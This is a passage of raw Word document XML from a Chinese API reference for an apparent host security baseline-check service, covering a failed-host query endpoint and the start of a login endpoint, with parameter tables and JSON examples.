              <w:lastRenderedPageBreak/>
              <w:t>remedDes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="286E2006" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23CF51DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60497476" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="查询检失败主机"/>
      <w:bookmarkEnd w:id="185"/>
      <w:r>
        <w:t>查询检失败主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D05CD5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A4B50A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/baseline/spec/failedHost/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C22077"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173"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1292"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2055E80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9645B49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A0EC222" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="733A582F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CD8A28C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB23B9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42A5DA4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FB42411" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobid，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28D5147C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE0D729" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45AB14F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F4F1B3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67ED41B8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117F8F4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A91D91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23E01E0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38080C8E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13FF12C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7F2099" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1712670D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27D66B38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DC0FB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "jobId": "59f6cddf7d761b2828add61b",  //jobid，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ip": "xxx",  //主机ip</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "xxx",  //主机名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": [1, 2]  //失败原因</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0052FD07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1B576" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentId" : "407c1dd87b1d7771",  //agentID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "displayIp" : "192.168.50.131",  //主机IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "internalIp" : "192.168.50.131",  //内网IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "externalIp" : null,  //外网IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname" : "ZYLI-WIN8SERVER",  //主机名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group":0,//业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "", //备注</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostTagList": [], //标签</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code" : 1, //失败码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "description" : "主机不在线",  //描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B2106"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300"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="967"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="22F8720B"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70EAB06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08C3FD85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61E18000" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="448AE46A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303BD502" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02676C5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B5264B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E81CB96" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F6986D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E66686E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C10FA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31DDB279" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="046C1E80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42DAC248" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5C1D52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0864A3ED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2114A413" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FE737C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5452D28F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="436331E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17F164C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22B34005" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51ABB59D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D581F8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F7E845F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43A90A5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46FEF05E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38830AE8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78BEBF5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BFF82D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A0A267" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55A23AA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164636AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EAC873B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BCCA9FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7045E4A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BB12083" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6539277E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CACE7CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="332958BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44612565" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DE467FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E7615A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="543E7040" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="登录请求"/>
      <w:bookmarkEnd w:id="186"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>登录请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65316C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725E4D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/baseline/auth/login/{linux，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C8AF19"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149"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1F34952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4F22540" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="388BF9EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CFF74E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A34CDD1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4B3E9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44AD8BB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50D4AE70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="011F183A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C87736" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73921381" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4603213E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C5D8FB7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F10E3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABBF13B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77225D2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C5F4FCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8529BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        //验证账号密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "password": "xxx"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F0F54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BD0EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
